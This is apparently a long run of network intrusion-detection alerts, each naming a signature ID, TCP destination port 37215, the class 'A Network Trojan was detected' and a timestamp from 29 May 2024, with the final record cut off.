                SID:2835222
                Source Port:42758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976344
                SID:2835222
                Source Port:51808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184184
                SID:2829579
                Source Port:40562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.723554
                SID:2835222
                Source Port:49980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289236
                SID:2829579
                Source Port:59158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561982
                SID:2835222
                Source Port:47550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899184
                SID:2829579
                Source Port:36592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437359
                SID:2835222
                Source Port:42038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319494
                SID:2829579
                Source Port:47486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914398
                SID:2835222
                Source Port:39530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958285
                SID:2829579
                Source Port:56466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860583
                SID:2835222
                Source Port:57770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329416
                SID:2829579
                Source Port:44666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941639
                SID:2829579
                Source Port:38830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218027
                SID:2829579
                Source Port:50060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841338
                SID:2829579
                Source Port:55098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837305
                SID:2835222
                Source Port:33676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960414
                SID:2835222
                Source Port:59684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504154
                SID:2829579
                Source Port:36466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784545
                SID:2829579
                Source Port:44000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536103
                SID:2829579
                Source Port:52740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420508
                SID:2835222
                Source Port:48512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900477
                SID:2829579
                Source Port:44200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890717
                SID:2835222
                Source Port:39936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275533
                SID:2835222
                Source Port:37166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088241
                SID:2829579
                Source Port:32852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292858
                SID:2829579
                Source Port:47152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.570807
                SID:2829579
                Source Port:33190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084738
                SID:2835222
                Source Port:32844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639037
                SID:2835222
                Source Port:47060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519906
                SID:2835222
                Source Port:48564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513846
                SID:2829579
                Source Port:48592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669473
                SID:2829579
                Source Port:34718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897060
                SID:2829579
                Source Port:48966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290524
                SID:2835222
                Source Port:44762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.231713
                SID:2829579
                Source Port:53734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887456
                SID:2835222
                Source Port:47808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271727
                SID:2829579
                Source Port:56990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321107
                SID:2829579
                Source Port:43240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628754
                SID:2829579
                Source Port:35860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.986734
                SID:2835222
                Source Port:33330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289003
                SID:2835222
                Source Port:42942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650059
                SID:2829579
                Source Port:36244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908901
                SID:2829579
                Source Port:42038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985473
                SID:2835222
                Source Port:55124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653364
                SID:2835222
                Source Port:43150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.037553
                SID:2829579
                Source Port:51704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321103
                SID:2835222
                Source Port:56672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.459640
                SID:2829579
                Source Port:38948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900439
                SID:2835222
                Source Port:59482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931792
                SID:2829579
                Source Port:52048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.093994
                SID:2829579
                Source Port:60134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547546
                SID:2829579
                Source Port:58740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893738
                SID:2829579
                Source Port:37368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984859
                SID:2829579
                Source Port:44116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024778
                SID:2835222
                Source Port:36012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.453570
                SID:2835222
                Source Port:39846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236539
                SID:2829579
                Source Port:43026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689588
                SID:2829579
                Source Port:35894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038192
                SID:2835222
                Source Port:46528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155547
                SID:2835222
                Source Port:40912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164990
                SID:2829579
                Source Port:40530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261819
                SID:2835222
                Source Port:59788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369548
                SID:2829579
                Source Port:53146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162751
                SID:2829579
                Source Port:38118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868044
                SID:2835222
                Source Port:54196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.439188
                SID:2829579
                Source Port:37062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290492
                SID:2835222
                Source Port:38122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737481
                SID:2829579
                Source Port:45660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324969
                SID:2829579
                Source Port:41828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182731
                SID:2835222
                Source Port:33326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372041
                SID:2835222
                Source Port:60894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791730
                SID:2829579
                Source Port:55554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100949
                SID:2835222
                Source Port:47712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420432
                SID:2835222
                Source Port:49562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773285
                SID:2829579
                Source Port:51020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574224
                SID:2829579
                Source Port:47894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292816
                SID:2835222
                Source Port:54720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960551
                SID:2835222
                Source Port:41438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160982
                SID:2829579
                Source Port:36868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783103
                SID:2835222
                Source Port:41520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169359
                SID:2835222
                Source Port:39744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274377
                SID:2835222
                Source Port:37306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.270305
                SID:2829579
                Source Port:37670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912740
                SID:2829579
                Source Port:40970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324870
                SID:2829579
                Source Port:51400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236180
                SID:2835222
                Source Port:42002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643242
                SID:2835222
                Source Port:34406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626921
                SID:2835222
                Source Port:42806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381720
                SID:2835222
                Source Port:49198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916784
                SID:2835222
                Source Port:51844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475071
                SID:2829579
                Source Port:51978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629281
                SID:2835222
                Source Port:42698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431195
                SID:2829579
                Source Port:38966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734739
                SID:2835222
                Source Port:42254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618849
                SID:2835222
                Source Port:49060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687844
                SID:2835222
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617620
                SID:2829579
                Source Port:42864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869378
                SID:2829579
                Source Port:34674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.058513
                SID:2835222
                Source Port:48692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811642
                SID:2829579
                Source Port:56998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175585
                SID:2829579
                Source Port:35892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782686
                SID:2829579
                Source Port:49950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.043290
                SID:2829579
                Source Port:33172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442073
                SID:2829579
                Source Port:47650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669032
                SID:2835222
                Source Port:48722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071589
                SID:2835222
                Source Port:47618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784082
                SID:2835222
                Source Port:53294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503504
                SID:2829579
                Source Port:50392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531294
                SID:2829579
                Source Port:34266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795990
                SID:2835222
                Source Port:49092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781459
                SID:2835222
                Source Port:38078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.137835
                SID:2835222
                Source Port:38234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264506
                SID:2835222
                Source Port:48262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711417
                SID:2835222
                Source Port:47690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088413
                SID:2835222
                Source Port:52228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172037
                SID:2829579
                Source Port:33300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039986
                SID:2835222
                Source Port:50800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807501
                SID:2829579
                Source Port:51682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788564
                SID:2835222
                Source Port:42276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799199
                SID:2835222
                Source Port:38288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.075761
                SID:2829579
                Source Port:58850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160924
                SID:2829579
                Source Port:35332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465483
                SID:2829579
                Source Port:40174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417212
                SID:2829579
                Source Port:50050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287070
                SID:2829579
                Source Port:51864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362449
                SID:2835222
                Source Port:58454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862970
                SID:2829579
                Source Port:35892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287679
                SID:2835222
                Source Port:36302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778164
                SID:2829579
                Source Port:38914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014843
                SID:2829579
                Source Port:53780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931113
                SID:2835222
                Source Port:55408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893531
                SID:2835222
                Source Port:44104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667935
                SID:2835222
                Source Port:44068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.033955
                SID:2835222
                Source Port:45470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520216
                SID:2829579
                Source Port:55252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659570
                SID:2835222
                Source Port:51816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.141545
                SID:2829579
                Source Port:47908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225155
                SID:2835222
                Source Port:34808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858871
                SID:2829579
                Source Port:36780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617155
                SID:2829579
                Source Port:33346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712069
                SID:2835222
                Source Port:39364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561816
                SID:2829579
                Source Port:37170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322270
                SID:2829579
                Source Port:53152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856341
                SID:2835222
                Source Port:41934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992666
                SID:2829579
                Source Port:36750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778324
                SID:2835222
                Source Port:60340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135862
                SID:2835222
                Source Port:44410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189872
                SID:2829579
                Source Port:38010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217111
                SID:2829579
                Source Port:58626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331300
                SID:2829579
                Source Port:40416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518484
                SID:2835222
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386195
                SID:2835222
                Source Port:40752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675170
                SID:2835222
                Source Port:38936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.660413
                SID:2829579
                Source Port:46546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845149
                SID:2829579
                Source Port:38752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.866207
                SID:2829579
                Source Port:49850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014941
                SID:2835222
                Source Port:36786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767594
                SID:2835222
                Source Port:42376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908016
                SID:2829579
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436737
                SID:2835222
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.964167
                SID:2829579
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.096281
                SID:2835222
                Source Port:46334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286729
                SID:2835222
                Source Port:33620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782145
                SID:2829579
                Source Port:42264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008931
                SID:2835222
                Source Port:54908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184593
                SID:2829579
                Source Port:46704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.426969
                SID:2829579
                Source Port:41974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872755
                SID:2829579
                Source Port:56792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326027
                SID:2829579
                Source Port:41084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762900
                SID:2829579
                Source Port:52766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470137
                SID:2835222
                Source Port:55674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.664237
                SID:2835222
                Source Port:36192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612235
                SID:2835222
                Source Port:52662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281652
                SID:2829579
                Source Port:46330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520465
                SID:2829579
                Source Port:50846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721264
                SID:2829579
                Source Port:50094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993058
                SID:2829579
                Source Port:35076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422025
                SID:2835222
                Source Port:45070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088136
                SID:2829579
                Source Port:42542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358718
                SID:2829579
                Source Port:37376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869530
                SID:2835222
                Source Port:52560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848705
                SID:2829579
                Source Port:49032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653540
                SID:2835222
                Source Port:34672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522913
                SID:2829579
                Source Port:34448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842263
                SID:2835222
                Source Port:42164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039576
                SID:2829579
                Source Port:41176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730518
                SID:2835222
                Source Port:48892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166928
                SID:2835222
                Source Port:48360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337348
                SID:2835222
                Source Port:54668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558528
                SID:2835222
                Source Port:46644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861590
                SID:2829579
                Source Port:43824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943615
                SID:2835222
                Source Port:34388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959060
                SID:2835222
                Source Port:42330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767090
                SID:2835222
                Source Port:44950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559442
                SID:2829579
                Source Port:57880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362968
                SID:2835222
                Source Port:57652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386207
                SID:2829579
                Source Port:53550
                Destination Port:37215
